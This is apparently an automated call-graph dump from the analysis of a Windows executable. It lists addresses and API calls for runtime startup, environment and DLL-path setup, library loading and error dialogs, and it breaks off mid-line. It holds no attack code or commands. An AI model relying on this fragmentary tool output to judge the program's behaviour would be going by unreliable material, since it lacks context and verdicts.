7ff614c8831c 17814->17816 17819 7ff614c89e48 __free_lconv_mon 11 API calls 17814->17819 17820 7ff614c8827f 17814->17820 17818 7ff614c89e00 _wfindfirst32i64 17 API calls 17816->17818 17817 7ff614c89e48 __free_lconv_mon 11 API calls 17817->17820 17821 7ff614c8832e 17818->17821 17819->17814 17820->17806 17823 7ff614c882f0 17822->17823 17824 7ff614c88335 17822->17824 17823->17817 17825 7ff614c8835e 17824->17825 17826 7ff614c89e48 __free_lconv_mon 11 API calls 17824->17826 17827 7ff614c89e48 __free_lconv_mon 11 API calls 17825->17827 17826->17824 17827->17823 18052 7ff614c99729 18053 7ff614c99742 18052->18053 18054 7ff614c99738 18052->18054 18056 7ff614c8f818 LeaveCriticalSection 18054->18056 18082 7ff614c90820 18093 7ff614c96794 18082->18093 18094 7ff614c967a1 18093->18094 18095 7ff614c89e48 __free_lconv_mon 11 API calls 18094->18095 18096 7ff614c967bd 18094->18096 18095->18094 18097 7ff614c89e48 __free_lconv_mon 11 API calls 18096->18097 18098 7ff614c90829 18096->18098 18097->18096 18099 7ff614c8f7b8 EnterCriticalSection 18098->18099 14676 7ff614c7b1cc 14701 7ff614c7b39c 14676->14701 14679 7ff614c7b318 14812 7ff614c7b6cc IsProcessorFeaturePresent 14679->14812 14680 7ff614c7b1e8 __scrt_acquire_startup_lock 14682 7ff614c7b322 14680->14682 14683 7ff614c7b206 14680->14683 14684 7ff614c7b6cc 7 API calls 14682->14684 14690 7ff614c7b248 __scrt_release_startup_lock 14683->14690 14709 7ff614c886a4 14683->14709 14688 7ff614c7b32d __FrameHandler3::FrameUnwindToEmptyState 14684->14688 14687 7ff614c7b22b 14691 7ff614c7b2b1 14690->14691 14801 7ff614c889b4 14690->14801 14718 7ff614c7b818 14691->14718 14693 7ff614c7b2b6 14721 7ff614c71000 14693->14721 14699 7ff614c7b2d9 14699->14688 14808 7ff614c7b530 14699->14808 14819 7ff614c7b99c 14701->14819 14704 7ff614c7b3cb 14821 7ff614c890bc 14704->14821 14705 7ff614c7b1e0 14705->14679 14705->14680 14710 7ff614c886b7 14709->14710 14711 7ff614c7b227 14710->14711 14864 7ff614c7b0e0 14710->14864 14711->14687 14713 7ff614c88660 14711->14713 14714 7ff614c88696 14713->14714 14715 7ff614c88665 14713->14715 14714->14690 14715->14714 15070 7ff614c842c0 14715->15070 15079 7ff614c7b1b0 14715->15079 15102 7ff614c7c240 14718->15102 14720 7ff614c7b82f GetStartupInfoW 14720->14693 14722 7ff614c7100b 14721->14722 15104 7ff614c77630 14722->15104 14724 7ff614c7101d 15111 7ff614c84f44 14724->15111 14726 7ff614c7369b 15118 7ff614c71af0 14726->15118 14730 7ff614c7adb0 _wfindfirst32i64 8 API calls 14731 7ff614c737ce 14730->14731 14806 7ff614c7b85c GetModuleHandleW 14731->14806 14732 7ff614c736b9 14761 7ff614c737ba 14732->14761 15134 7ff614c73b40 14732->15134 14734 7ff614c736eb 14734->14761 15137 7ff614c769b0 14734->15137 14736 7ff614c73707 14737 7ff614c73753 14736->14737 14738 7ff614c769b0 61 API calls 14736->14738 15152 7ff614c76fc0 14737->15152 14744 7ff614c73728 __std_exception_destroy 14738->14744 14740 7ff614c73768 15156 7ff614c719d0 14740->15156 14743 7ff614c7385d 14746 7ff614c73888 14743->14746 15271 7ff614c732a0 14743->15271 14744->14737 14748 7ff614c76fc0 58 API calls 14744->14748 14745 7ff614c719d0 121 API calls 14747 7ff614c7379e 14745->14747 14757 7ff614c738cb 14746->14757 15275 7ff614c77a60 14746->15275 14752 7ff614c737a2 14747->14752 14753 7ff614c737e0 14747->14753 14748->14737 14751 7ff614c738a8 14754 7ff614c738ad 14751->14754 14755 7ff614c738be SetDllDirectoryW 14751->14755 15235 7ff614c72770 14752->15235 14753->14743 15248 7ff614c73cd0 14753->15248 14758 7ff614c72770 59 API calls 14754->14758 14755->14757 15167 7ff614c75e60 14757->15167 14758->14761 14761->14730 14764 7ff614c7391a 14772 7ff614c739e6 14764->14772 14778 7ff614c73939 14764->14778 14765 7ff614c73802 14769 7ff614c72770 59 API calls 14765->14769 14768 7ff614c73830 14768->14743 14771 7ff614c73835 14768->14771 14769->14761 14770 7ff614c738e8 14770->14764 15299 7ff614c75660 14770->15299 15267 7ff614c7f2dc 14771->15267 15171 7ff614c73130 14772->15171 14786 7ff614c73985 14778->14786 15335 7ff614c71b30 14778->15335 14779 7ff614c7391c 14781 7ff614c758b0 FreeLibrary 14779->14781 14781->14764 14785 7ff614c73a1b 14788 7ff614c769b0 61 API calls 14785->14788 14786->14761 15339 7ff614c730d0 14786->15339 14787 7ff614c7390b 15329 7ff614c75cb0 14787->15329 14792 7ff614c73a27 14788->14792 14791 7ff614c739c1 14793 7ff614c758b0 FreeLibrary 14791->14793 14792->14761 15188 7ff614c77000 14792->15188 14793->14761 14802 7ff614c889cb 14801->14802 14803 7ff614c889ec 14801->14803 14802->14691 17764 7ff614c89108 14803->17764 14807 7ff614c7b86d 14806->14807 14807->14699 14810 7ff614c7b541 14808->14810 14809 7ff614c7b2f0 14809->14687 14810->14809 14811 7ff614c7caf8 __scrt_initialize_crt 7 API calls 14810->14811 14811->14809 14813 7ff614c7b6f2 _wfindfirst32i64 __scrt_get_show_window_mode 14812->14813 14814 7ff614c7b711 RtlCaptureContext RtlLookupFunctionEntry 14813->14814 14815 7ff614c7b73a RtlVirtualUnwind 14814->14815 14816 7ff614c7b776 __scrt_get_show_window_mode 14814->14816 14815->14816 14817 7ff614c7b7a8 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 14816->14817 14818 7ff614c7b7fa _wfindfirst32i64 14817->14818 14818->14682 14820 7ff614c7b3be __scrt_dllmain_crt_thread_attach 14819->14820 14820->14704 14820->14705 14822 7ff614c925fc 14821->14822 14823 7ff614c7b3d0 14822->14823 14831 7ff614c8ba20 14822->14831 14823->14705 14825 7ff614c7caf8 14823->14825 14826 7ff614c7cb0a 14825->14826 14827 7ff614c7cb00 14825->14827 14826->14705 14843 7ff614c7ce74 14827->14843 14842 7ff614c8f7b8 EnterCriticalSection 14831->14842 14844 7ff614c7ce83 14843->14844 14845 7ff614c7cb05 14843->14845 14851 7ff614c7d0b0 14844->14851 14847 7ff614c7cee0 14845->14847 14848 7ff614c7cf0b 14847->14848 14849 7ff614c7cf0f 14848->14849 14850 7ff614c7ceee DeleteCriticalSection 14848->14850 14849->14826 14850->14848 14855 7ff614c7cf18 14851->14855 14856 7ff614c7cf5c __vcrt_FlsAlloc 14855->14856 14862 7ff614c7d032 TlsFree 14855->14862 14857 7ff614c7cf8a LoadLibraryExW 14856->14857 14858 7ff614c7d021 GetProcAddress 14856->14858 14856->14862 14863 7ff614c7cfcd LoadLibraryExW 14856->14863 14859 7ff614c7cfab GetLastError 14857->14859 14860 7ff614c7d001 14857->14860 14858->14862 14859->14856 14860->14858 14861 7ff614c7d018 FreeLibrary 14860->14861 14861->14858 14863->14856 14863->14860 14865 7ff614c7b0f0 14864->14865 14881 7ff614c857cc 14865->14881 14867 7ff614c7b0fc 14887 7ff614c7b3e8 14867->14887 14869 7ff614c7b6cc 7 API calls 14871 7ff614c7b195 14869->14871 14870 7ff614c7b114 _RTC_Initialize 14879 7ff614c7b169 14870->14879 14892 7ff614c7b598 14870->14892 14871->14710 14873 7ff614c7b129 14895 7ff614c87e9c 14873->14895 14879->14869 14880 7ff614c7b185 14879->14880 14880->14710 14882 7ff614c857dd 14881->14882 14883 7ff614c857e5 14882->14883 14922 7ff614c84474 14882->14922 14883->14867 14888 7ff614c7b3f9 14887->14888 14891 7ff614c7b3fe __scrt_acquire_startup_lock 14887->14891 14889 7ff614c7b6cc 7 API calls 14888->14889 14888->14891 14890 7ff614c7b472 14889->14890 14891->14870 15049 7ff614c7b55c 14892->15049 14894 7ff614c7b5a1 14894->14873 14896 7ff614c87ebc 14895->14896 14897 7ff614c7b135 14895->14897 14898 7ff614c87eda GetModuleFileNameW 14896->14898 14899 7ff614c87ec4 14896->14899 14897->14879 14921 7ff614c7b66c InitializeSListHead 14897->14921 14903 7ff614c87f05 14898->14903 14900 7ff614c84474 _set_fmode 11 API calls 14899->14900 14901 7ff614c87ec9 14900->14901 14902 7ff614c89de0 _invalid_parameter_noinfo 37 API calls 14901->14902 14902->14897 15064 7ff614c87e3c 14903->15064 14906 7ff614c87f4d 14908 7ff614c84474 _set_fmode 11 API calls 14906->14908 14907 7ff614c87f65 14911 7ff614c87f87 14907->14911 14914 7ff614c87fcc 14907->14914 14915 7ff614c87fb3 14907->14915 14909 7ff614c87f52 14908->14909 14910 7ff614c89e48 __free_lconv_mon 11 API calls 14909->14910 14912 7ff614c87f60 14910->14912 14913 7ff614c89e48 __free_lconv_mon 11 API calls 14911->14913 14912->14897 14913->14897 14917 7ff614c89e48 __free_lconv_mon 11 API calls 14914->14917 14916 7ff614c89e48 __free_lconv_mon 11 API calls 14915->14916 14918 7ff614c87fbc 14916->14918 14917->14911 14919 7ff614c89e48 __free_lconv_mon 11 API calls 14918->14919 14920 7ff614c87fc8 14919->14920 14920->14897 14927 7ff614c8a7c8 GetLastError 14922->14927 14924 7ff614c8447d 14925 7ff614c89de0 14924->14925 14985 7ff614c89c78 14925->14985 14928 7ff614c8a809 FlsSetValue 14927->14928 14932 7ff614c8a7ec 14927->14932 14929 7ff614c8a81b 14928->14929 14941 7ff614c8a7f9 SetLastError 14928->14941 14944 7ff614c8dd70 14929->14944 14932->14928 14932->14941 14934 7ff614c8a848 FlsSetValue 14937 7ff614c8a854 FlsSetValue 14934->14937 14938 7ff614c8a866 14934->14938 14935 7ff614c8a838 FlsSetValue 14936 7ff614c8a841 14935->14936 14951 7ff614c89e48 14936->14951 14937->14936 14957 7ff614c8a3f4 14938->14957 14941->14924 14949 7ff614c8dd81 _set_fmode 14944->14949 14945 7ff614c8ddd2 14948 7ff614c84474 _set_fmode 10 API calls 14945->14948 14946 7ff614c8ddb6 RtlAllocateHeap 14947 7ff614c8a82a 14946->14947 14946->14949 14947->14934 14947->14935 14948->14947 14949->14945 14949->14946 14962 7ff614c926e0 14949->14962 14952 7ff614c89e7c 14951->14952 14953 7ff614c89e4d RtlReleasePrivilege 14951->14953 14952->14941 14953->14952 14954 7ff614c89e68 GetLastError 14953->14954 14955 7ff614c89e75 __free_lconv_mon 14954->14955 14956 7ff614c84474 _set_fmode 9 API calls 14955->14956 14956->14952 14971 7ff614c8a2cc 14957->14971 14965 7ff614c92720 14962->14965 14970 7ff614c8f7b8 EnterCriticalSection 14965->14970 14983 7ff614c8f7b8 EnterCriticalSection 14971->14983 14986 7ff614c89ca3 14985->14986 14989 7ff614c89d14 14986->14989 14988 7ff614c89cca 14997 7ff614c89a5c 14989->14997 14992 7ff614c89d4f 14992->14988 14998 7ff614c89ab3 14997->14998 14999 7ff614c89a78 GetLastError 14997->14999 14998->14992 15003 7ff614c89ac8 14998->15003 15000 7ff614c89a88 14999->15000 15010 7ff614c8a890 15000->15010 15004 7ff614c89ae4 GetLastError SetLastError 15003->15004 15005 7ff614c89afc 15003->15005 15004->15005 15005->14992 15006 7ff614c89e00 IsProcessorFeaturePresent 15005->15006 15007 7ff614c89e13 15006->15007 15027 7ff614c89b14 15007->15027 15011 7ff614c8a8af FlsGetValue 15010->15011 15012 7ff614c8a8ca FlsSetValue 15010->15012 15014 7ff614c8a8c4 15011->15014 15015 7ff614c89aa3 SetLastError 15011->15015 15013 7ff614c8a8d7 15012->15013 15012->15015 15016 7ff614c8dd70 _set_fmode 11 API calls 15013->15016 15014->15012 15015->14998 15017 7ff614c8a8e6 15016->15017 15018 7ff614c8a904 FlsSetValue 15017->15018 15019 7ff614c8a8f4 FlsSetValue 15017->15019 15021 7ff614c8a910 FlsSetValue 15018->15021 15022 7ff614c8a922 15018->15022 15020 7ff614c8a8fd 15019->15020 15023 7ff614c89e48 __free_lconv_mon 11 API calls 15020->15023 15021->15020 15024 7ff614c8a3f4 _set_fmode 11 API calls 15022->15024 15023->15015 15025 7ff614c8a92a 15024->15025 15026 7ff614c89e48 __free_lconv_mon 11 API calls 15025->15026 15026->15015 15028 7ff614c89b4e _wfindfirst32i64 __scrt_get_show_window_mode 15027->15028 15029 7ff614c89b76 RtlCaptureContext RtlLookupFunctionEntry 15028->15029 15030 7ff614c89bb0 RtlVirtualUnwind 15029->15030 15031 7ff614c89be6 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 15029->15031 15030->15031 15032 7ff614c89c38 _wfindfirst32i64 15031->15032 15035 7ff614c7adb0 15032->15035 15036 7ff614c7adb9 15035->15036 15037 7ff614c7ae70 IsProcessorFeaturePresent 15036->15037 15038 7ff614c7adc4 GetCurrentProcess TerminateProcess 15036->15038 15039 7ff614c7ae88 15037->15039 15044 7ff614c7b064 RtlCaptureContext 15039->15044 15045 7ff614c7b07e RtlLookupFunctionEntry 15044->15045 15046 7ff614c7ae9b 15045->15046 15047 7ff614c7b094 RtlVirtualUnwind 15045->15047 15048 7ff614c7ae30 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 15046->15048 15047->15045 15047->15046 15050 7ff614c7b576 15049->15050 15052 7ff614c7b56f 15049->15052 15053 7ff614c88f1c 15050->15053 15052->14894 15056 7ff614c88b58 15053->15056 15063 7ff614c8f7b8 EnterCriticalSection 15056->15063 15065 7ff614c87e54 15064->15065 15069 7ff614c87e8c 15064->15069 15066 7ff614c8dd70 _set_fmode 11 API calls 15065->15066 15065->15069 15067 7ff614c87e82 15066->15067 15068 7ff614c89e48 __free_lconv_mon 11 API calls 15067->15068 15068->15069 15069->14906 15069->14907 15071 7ff614c842cb 15070->15071 15087 7ff614c8e384 15071->15087 15101 7ff614c7b8b0 SetUnhandledExceptionFilter 15079->15101 15100 7ff614c8f7b8 EnterCriticalSection 15087->15100 15103 7ff614c7c220 15102->15103 15103->14720 15103->15103 15106 7ff614c7764f 15104->15106 15105 7ff614c776a0 WideCharToMultiByte 15105->15106 15108 7ff614c77748 15105->15108 15106->15105 15107 7ff614c776f6 WideCharToMultiByte 15106->15107 15106->15108 15110 7ff614c77657 __std_exception_destroy 15106->15110 15107->15106 15107->15108 15376 7ff614c72620 15108->15376 15110->14724 15112 7ff614c8ec70 15111->15112 15114 7ff614c8ed16 15112->15114 15115 7ff614c8ecc3 15112->15115 15113 7ff614c89d14 _invalid_parameter_noinfo 37 API calls 15117 7ff614c8ecec 15113->15117 15773 7ff614c8eb48 15114->15773 15115->15113 15117->14726 15119 7ff614c71b05 15118->15119 15120 7ff614c71b20 15119->15120 15781 7ff614c724d0 15119->15781 15120->14761 15122 7ff614c73bc0 15120->15122 15123 7ff614c7ade0 15122->15123 15124 7ff614c73bcc GetModuleFileNameW 15123->15124 15125 7ff614c73bfb 15124->15125 15126 7ff614c73c12 15124->15126 15127 7ff614c72620 57 API calls 15125->15127 15821 7ff614c77b70 15126->15821 15129 7ff614c73c0e 15127->15129 15132 7ff614c7adb0 _wfindfirst32i64 8 API calls 15129->15132 15131 7ff614c72770 59 API calls 15131->15129 15133 7ff614c73c4f 15132->15133 15133->14732 15135 7ff614c71b30 49 API calls 15134->15135 15136 7ff614c73b5d 15135->15136 15136->14734 15138 7ff614c769ba 15137->15138 15139 7ff614c77a60 57 API calls 15138->15139 15140 7ff614c769dc GetEnvironmentVariableW 15139->15140 15141 7ff614c76a46 15140->15141 15142 7ff614c769f4 ExpandEnvironmentStringsW 15140->15142 15143 7ff614c7adb0 _wfindfirst32i64 8 API calls 15141->15143 15144 7ff614c77b70 59 API calls 15142->15144 15145 7ff614c76a58 15143->15145 15146 7ff614c76a1c 15144->15146 15145->14736 15146->15141 15147 7ff614c76a26 15146->15147 15832 7ff614c8913c 15147->15832 15150 7ff614c7adb0 _wfindfirst32i64 8 API calls 15151 7ff614c76a3e 15150->15151 15151->14736 15153 7ff614c77a60 57 API calls 15152->15153 15154 7ff614c76fd7 SetEnvironmentVariableW 15153->15154 15155 7ff614c76fef __std_exception_destroy 15154->15155 15155->14740 15157 7ff614c71b30 49 API calls 15156->15157 15158 7ff614c71a00 15157->15158 15159 7ff614c71b30 49 API calls 15158->15159 15166 7ff614c71a7a 15158->15166 15160 7ff614c71a22 15159->15160 15161 7ff614c73b40 49 API calls 15160->15161 15160->15166 15162 7ff614c71a3b 15161->15162 15839 7ff614c717b0 15162->15839 15165 7ff614c7f2dc 74 API calls 15165->15166 15166->14743 15166->14745 15168 7ff614c75e75 15167->15168 15169 7ff614c738d0 15168->15169 15170 7ff614c724d0 59 API calls 15168->15170 15169->14764 15289 7ff614c75b00 15169->15289 15170->15169 15178 7ff614c731a3 15171->15178 15180 7ff614c731e4 15171->15180 15172 7ff614c73223 15174 7ff614c7adb0 _wfindfirst32i64 8 API calls 15172->15174 15173 7ff614c71ab0 74 API calls 15173->15180 15175 7ff614c73235 15174->15175 15175->14761 15181 7ff614c76f50 15175->15181 15178->15180 15912 7ff614c71440 15178->15912 15946 7ff614c729b0 15178->15946 16001 7ff614c71780 15178->16001 15180->15172 15180->15173 15182 7ff614c77a60 57 API calls 15181->15182 15183 7ff614c76f6f 15182->15183 15184 7ff614c77a60 57 API calls 15183->15184 15185 7ff614c76f7f 15184->15185 15186 7ff614c866e4 38 API calls 15185->15186 15187 7ff614c76f8d __std_exception_destroy 15186->15187 15187->14785 15189 7ff614c77010 15188->15189 15190 7ff614c77a60 57 API calls 15189->15190 15191 7ff614c77041 SetConsoleCtrlHandler GetStartupInfoW 15190->15191 15192 7ff614c770a2 15191->15192 16877 7ff614c891b4 15192->16877 15236 7ff614c72790 15235->15236 15237 7ff614c83c14 49 API calls 15236->15237 15238 7ff614c727db __scrt_get_show_window_mode 15237->15238 15239 7ff614c77a60 57 API calls 15238->15239 15240 7ff614c72810 15239->15240 15241 7ff614c7284d MessageBoxA 15240->15241 15242 7ff614c72815 15240->15242 15244 7ff614c72867 15241->15244 15243 7ff614c77a60 57 API calls 15242->15243 15245 7ff614c7282f MessageBoxW 15243->15245 15246 7ff614c7adb0 _wfindfirst32i64 8 API calls 15244->15246 15245->15244 15247 7ff614c72877 15246->15247 15247->14761 15249 7ff614c73cdc 15248->15249 15250 7ff614c77a60 57 API calls 15249->15250 15251 7ff614c73d07 15250->15251 15252 7ff614c77a60 57 API calls 15251->15252 15253 7ff614c73d1a 15252->15253 16933 7ff614c854f8 15253->16933 15256 7ff614c7adb0 _wfindfirst32i64 8 API calls 15257 7ff614c737fa 15256->15257 15257->14765 15258 7ff614c77230 15257->15258 15259 7ff614c77254 15258->15259 15260 7ff614c7732b __std_exception_destroy 15259->15260 15261 7ff614c7f964 73 API calls 15259->15261 15260->14768 15262 7ff614c7726e 15261->15262 15262->15260 17312 7ff614c87968 15262->17312 15264 7ff614c77283 15264->15260 15265 7ff614c7f964 73 API calls 15264->15265 15266 7ff614c7f62c _fread_nolock 53 API calls 15264->15266 15265->15264 15266->15264 15268 7ff614c7f30c 15267->15268 17327 7ff614c7f0b8 15268->17327 15270 7ff614c7f325 15270->14765 15272 7ff614c732e0 15271->15272 15274 7ff614c732b7 15271->15274 15272->14746 15273 7ff614c71780 59 API calls 15273->15274 15274->15272 15274->15273 15276 7ff614c77b07 MultiByteToWideChar 15275->15276 15277 7ff614c77a81 MultiByteToWideChar 15275->15277 15278 7ff614c77b2a 15276->15278 15279 7ff614c77b4f 15276->15279 15280 7ff614c77aa7 15277->15280 15285 7ff614c77acc 15277->15285 15281 7ff614c72620 55 API calls 15278->15281 15279->14751 15282 7ff614c72620 55 API calls 15280->15282 15283 7ff614c77b3d 15281->15283 15284 7ff614c77aba 15282->15284 15283->14751 15284->14751 15285->15276 15286 7ff614c77ae2 15285->15286 15287 7ff614c72620 55 API calls 15286->15287 15288 7ff614c77af5 15287->15288 15288->14751 15290 7ff614c75b24 15289->15290 15294 7ff614c75b51 15289->15294 15291 7ff614c75b4c 15290->15291 15292 7ff614c71780 59 API calls 15290->15292 15290->15294 15298 7ff614c75b47 memcpy_s __std_exception_destroy 15290->15298 17338 7ff614c712b0 15291->17338 15292->15290 15294->15298 17364 7ff614c73d50 15294->17364 15296 7ff614c75bb7 15297 7ff614c72770 59 API calls 15296->15297 15296->15298 15297->15298 15298->14770 15313 7ff614c7567a memcpy_s 15299->15313 15301 7ff614c7579f 15303 7ff614c73d50 49 API calls 15301->15303 15302 7ff614c757bb 15305 7ff614c72770 59 API calls 15302->15305 15304 7ff614c75818 15303->15304 15308 7ff614c73d50 49 API calls 15304->15308 15309 7ff614c757b1 __std_exception_destroy 15305->15309 15306 7ff614c73d50 49 API calls 15306->15313 15307 7ff614c75780 15307->15301 15310 7ff614c73d50 49 API calls 15307->15310 15311 7ff614c75848 15308->15311 15312 7ff614c7adb0 _wfindfirst32i64 8 API calls 15309->15312 15310->15301 15316 7ff614c73d50 49 API calls 15311->15316 15314 7ff614c738f9 15312->15314 15313->15301 15313->15302 15313->15306 15313->15307 15313->15313 15315 7ff614c71440 161 API calls 15313->15315 15317 7ff614c757a1 15313->15317 17367 7ff614c71650 15313->17367 15314->14779 15319 7ff614c755e0 15314->15319 15315->15313 15316->15309 15318 7ff614c72770 59 API calls 15317->15318 15318->15309 17372 7ff614c771e0 15319->17372 15321 7ff614c755fc 15322 7ff614c771e0 58 API calls 15321->15322 15323 7ff614c7560f 15322->15323 15324 7ff614c75645 15323->15324 15325 7ff614c75627 15323->15325 15326 7ff614c72770 59 API calls 15324->15326 17376 7ff614c75f70 GetProcAddress 15325->17376 15328 7ff614c73907 15326->15328 15328->14779 15328->14787 15336 7ff614c71b55 15335->15336 15337 7ff614c83c14 49 API calls 15336->15337 15338 7ff614c71b78 15337->15338 15338->14786 17435 7ff614c74980 15339->17435 15342 7ff614c7311d 15342->14791 15344 7ff614c730f4 15344->15342 17491 7ff614c74700 15344->17491 15395 7ff614c7ade0 15376->15395 15379 7ff614c72669 15397 7ff614c83c14 15379->15397 15384 7ff614c71b30 49 API calls 15385 7ff614c726c6 __scrt_get_show_window_mode 15384->15385 15386 7ff614c77a60 54 API calls 15385->15386 15387 7ff614c726fb 15386->15387 15388 7ff614c72738 MessageBoxA 15387->15388 15389 7ff614c72700 15387->15389 15391 7ff614c72752 15388->15391 15390 7ff614c77a60 54 API calls 15389->15390 15392 7ff614c7271a MessageBoxW 15390->15392 15393 7ff614c7adb0 _wfindfirst32i64 8 API calls 15391->15393 15392->15391 15394 7ff614c72762 15393->15394 15394->15110 15396 7ff614c7263c GetLastError 15395->15396 15396->15379 15399 7ff614c83c6e 15397->15399 15398 7ff614c83c93 15401 7ff614c89d14 _invalid_parameter_noinfo 37 API calls 15398->15401 15399->15398 15400 7ff614c83ccf 15399->15400 15427 7ff614c81ea0 15400->15427 15414 7ff614c83cbd 15401->15414 15403 7ff614c83dac 15406 7ff614c89e48 __free_lconv_mon 11 API calls 15403->15406 15405 7ff614c7adb0 _wfindfirst32i64 8 API calls 15407 7ff614c72697 15405->15407 15406->15414 15415 7ff614c774e0 15407->15415 15408 7ff614c83d81 15412 7ff614c89e48 __free_lconv_mon 11 API calls 15408->15412 15409 7ff614c83dd0 15409->15403 15411 7ff614c83dda 15409->15411 15410 7ff614c83d78 15410->15403 15410->15408 15413 7ff614c89e48 __free_lconv_mon 11 API calls 15411->15413 15412->15414 15413->15414 15414->15405 15416 7ff614c774ec 15415->15416 15417 7ff614c7750d FormatMessageW 15416->15417 15418 7ff614c77507 GetLastError 15416->15418 15419 7ff614c7755c WideCharToMultiByte 15417->15419 15420 7ff614c77540 15417->15420 15418->15417 15422 7ff614c77596 15419->15422 15424 7ff614c77553 15419->15424 15421 7ff614c72620 54 API calls 15420->15421 15421->15424 15423 7ff614c72620 54 API calls 15422->15423 15423->15424 15425 7ff614c7adb0 _wfindfirst32i64 8 API calls 15424->15425 15426 7ff614c7269e 15425->15426 15426->15384 15428 7ff614c81ede 15427->15428 15433 7ff614c81ece 15427->15433 15429 7ff614c81ee7 15428->15429 15439 7ff614c81f15 15428->15439 15432 7ff614c89d14 _invalid_parameter_noinfo 37 API calls 15429->15432 15430 7ff614c81f0d 15430->15403 15430->15408 15430->15409 15430->15410 15431 7ff614c89d14 _invalid_parameter_noinfo 37 API calls 15431->15430 15432->15430 15433->15431 15436 7ff614c821c4 15438 7ff614c89d14 _invalid_parameter_noinfo 37 API calls 15436->15438 15438->15433 15439->15430 15439->15433 15439->15436 15441 7ff614c82830 15439->15441 15467 7ff614c824f8 15439->15467 15497 7ff614c81d80 15439->15497 15500 7ff614c83a50 15439->15500 15442 7ff614c828e5 15441->15442 15443 7ff614c82872 15441->15443 15446 7ff614c828ea 15442->15446 15447 7ff614c8293f 15442->15447 15444 7ff614c82878 15443->15444 15445 7ff614c8290f 15443->15445 15452 7ff614c8287d 15444->15452 15455 7ff614c8294e 15444->15455 15524 7ff614c80de0 15445->15524 15448 7ff614c828ec 15446->15448 15449 7ff614c8291f 15446->15449 15447->15445 15447->15455 15457 7ff614c828a8 15447->15457 15451 7ff614c8288d 15448->15451 15459 7ff614c828fb 15448->15459 15531 7ff614c809d0 15449->15531 15466 7ff614c8297d 15451->15466 15506 7ff614c83194 15451->15506 15452->15451 15456 7ff614c828c0 15452->15456 15452->15457 15455->15466 15538 7ff614c811f0 15455->15538 15456->15466 15516 7ff614c83650 15456->15516 15457->15466 15545 7ff614c8da30 15457->15545 15459->15445 15460 7ff614c82900 15459->15460 15460->15466 15520 7ff614c837e8 15460->15520 15462 7ff614c7adb0 _wfindfirst32i64 8 API calls 15464 7ff614c82c13 15462->15464 15464->15439 15466->15462 15468 7ff614c82519 15467->15468 15469 7ff614c82503 15467->15469 15470 7ff614c89d14 _invalid_parameter_noinfo 37 API calls 15468->15470 15473 7ff614c82557 15468->15473 15471 7ff614c828e5 15469->15471 15472 7ff614c82872 15469->15472 15469->15473 15470->15473 15476 7ff614c828ea 15471->15476 15477 7ff614c8293f 15471->15477 15474 7ff614c82878 15472->15474 15475 7ff614c8290f 15472->15475 15473->15439 15484 7ff614c8287d 15474->15484 15486 7ff614c8294e 15474->15486 15480 7ff614c80de0 38 API calls 15475->15480 15478 7ff614c828ec 15476->15478 15479 7ff614c8291f 15476->15479 15477->15475 15477->15486 15495 7ff614c828a8 15477->15495 15481 7ff614c8288d 15478->15481 15488 7ff614c828fb 15478->15488 15482 7ff614c809d0 38 API calls 15479->15482 15480->15495 15483 7ff614c83194 47 API calls 15481->15483 15496 7ff614c8297d 15481->15496 15482->15495 15483->15495 15484->15481 15485 7ff614c828c0 15484->15485 15484->15495 15490 7ff614c83650 47 API calls 15485->15490 15485->15496 15487 7ff614c811f0 38 API calls 15486->15487 15486->15496 15487->15495 15488->15475 15489 7ff614c82900 15488->15489 15492 7ff614c837e8 37 API calls 15489->15492 15489->15496 15490->15495 15491 7ff614c7adb0 _wfindfirst32i64 8 API calls 15493 7ff614c82c13 15491->15493 15492->15495 15493->15439 15494 7ff614c8da30 47 API calls 15494->15495 15495->15494 15495->15496 15496->15491 15701 7ff614c7ffa4 15497->15701 15501 7ff614c83a67 15500->15501 15718 7ff614c8cb90 15501->15718 15507 7ff614c831b6 15506->15507 15555 7ff614c7fe10 15507->15555 15512 7ff614c8337c 15512->15457 15513 7ff614c832f3 15513->15512 15515 7ff614c83a50 45 API calls 15513->15515 15514 7ff614c83a50 45 API calls 15514->15513 15515->15512 15517 7ff614c83668 15516->15517 15519 7ff614c836d0 15516->15519 15518 7ff614c8da30 47 API calls 15517->15518 15517->15519 15518->15519 15519->15457 15521 7ff614c83809 15520->15521 15522 7ff614c89d14 _invalid_parameter_noinfo 37 API calls 15521->15522 15523 7ff614c8383a 15521->15523 15522->15523 15523->15457 15525 7ff614c80e13 15524->15525 15526 7ff614c80e42 15525->15526 15528 7ff614c80eff 15525->15528 15527 7ff614c7fe10 12 API calls 15526->15527 15530 7ff614c80e7f 15526->15530 15527->15530 15529 7ff614c89d14 _invalid_parameter_noinfo 37 API calls 15528->15529 15529->15530 15530->15457 15532 7ff614c80a03 15531->15532 15533 7ff614c80a32 15532->15533 15535 7ff614c80aef 15532->15535 15534 7ff614c7fe10 12 API calls 15533->15534 15537 7ff614c80a6f 15533->15537 15534->15537 15536 7ff614c89d14 _invalid_parameter_noinfo 37 API calls 15535->15536 15536->15537 15537->15457 15539 7ff614c81223 15538->15539 15540 7ff614c81252 15539->15540 15542 7ff614c8130f 15539->15542 15541 7ff614c7fe10 12 API calls 15540->15541 15544 7ff614c8128f 15540->15544 15541->15544 15543 7ff614c89d14 _invalid_parameter_noinfo 37 API calls 15542->15543 15543->15544 15544->15457 15546 7ff614c8da58 15545->15546 15547 7ff614c8da9d 15546->15547 15549 7ff614c83a50 45 API calls 15546->15549 15551 7ff614c8da5d __scrt_get_show_window_mode 15546->15551 15554 7ff614c8da86 __scrt_get_show_window_mode 15546->15554 15547->15551 15547->15554 15698 7ff614c8f0e8 15547->15698 15548 7ff614c89d14 _invalid_parameter_noinfo 37 API calls 15548->15551 15549->15547 15551->15457 15554->15548 15554->15551 15556 7ff614c7fe47 15555->15556 15561 7ff614c7fe36 15555->15561 15556->15561 15585 7ff614c8cafc 15556->15585 15559 7ff614c89e48 __free_lconv_mon 11 API calls 15559->15561 15560 7ff614c89e48 __free_lconv_mon 11 API calls 15562 7ff614c7fe88 15560->15562 15563 7ff614c8d748 15561->15563 15562->15559 15564 7ff614c8d765 15563->15564 15565 7ff614c8d798 15563->15565 15566 7ff614c89d14 _invalid_parameter_noinfo 37 API calls 15564->15566 15565->15564 15567 7ff614c8d7ca 15565->15567 15575 7ff614c832d1 15566->15575 15571 7ff614c8d8dd 15567->15571 15580 7ff614c8d812 15567->15580 15568 7ff614c8d9cf 15625 7ff614c8cc34 15568->15625 15570 7ff614c8d995 15618 